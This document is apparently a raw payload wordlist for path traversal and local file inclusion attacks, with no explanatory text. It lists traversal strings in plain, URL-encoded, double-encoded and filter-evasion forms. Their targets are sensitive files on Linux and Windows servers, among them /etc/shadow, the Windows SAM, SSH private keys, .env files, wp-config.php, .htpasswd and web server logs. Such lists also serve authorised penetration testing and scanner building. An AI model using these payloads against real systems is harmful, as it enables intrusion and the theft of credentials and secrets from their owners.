../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/hosts
../../../etc/motd
../../../etc/issue
../../../etc/mysql/my.cnf
../../../etc/php/php.ini
../../../etc/httpd/conf/httpd.conf
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/stat
../../../var/log/apache/access.log
../../../var/log/apache2/access.log
../../../var/log/httpd/access_log
../../../var/log/nginx/access.log
../../../var/www/html/index.php
../../../var/www/html/wp-config.php
../../../usr/local/etc/php.ini
../../windows/system32/drivers/etc/hosts
../../windows/win.ini
../../windows/system.ini
../../windows/repair/sam
../../windows/repair/system
../../windows/debug/netsetup.log
../../windows/iis6.log
../../windows/system32/config/systemprofile
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\Program Files\Common Files\System\ado\msado15.dll
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
....//....//....//....//....//....//etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5cwindows\system32\drivers\etc\hosts
/var/www/html/admin/config.php
/var/www/html/admin/db.php
/var/www/html/includes/config.php
/var/www/html/includes/db.php
/var/www/html/configuration.php
/var/www/html/config.inc.php
/etc/php5/apache2/php.ini
/etc/php7/apache2/php.ini
/etc/php/7.0/apache2/php.ini
/etc/php/7.1/apache2/php.ini
/etc/php/7.2/apache2/php.ini
/etc/php/7.3/apache2/php.ini
/etc/php/7.4/apache2/php.ini
/etc/php/8.0/apache2/php.ini
/usr/local/apache2/conf/httpd.conf
/usr/local/nginx/conf/nginx.conf
/opt/lampp/etc/httpd.conf
/xampp/apache/conf/httpd.conf
/home/user/.bash_history
/home/user/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
.htaccess
.htpasswd
.git/config
.svn/entries
.env
wp-config.php
config.php
configuration.php
sites/default/settings.php
app/etc/local.xml
inc/config.php
include/config.php
admin/config.php
administrator/config.php
panel/config.php
management/config.php
manager/config.php 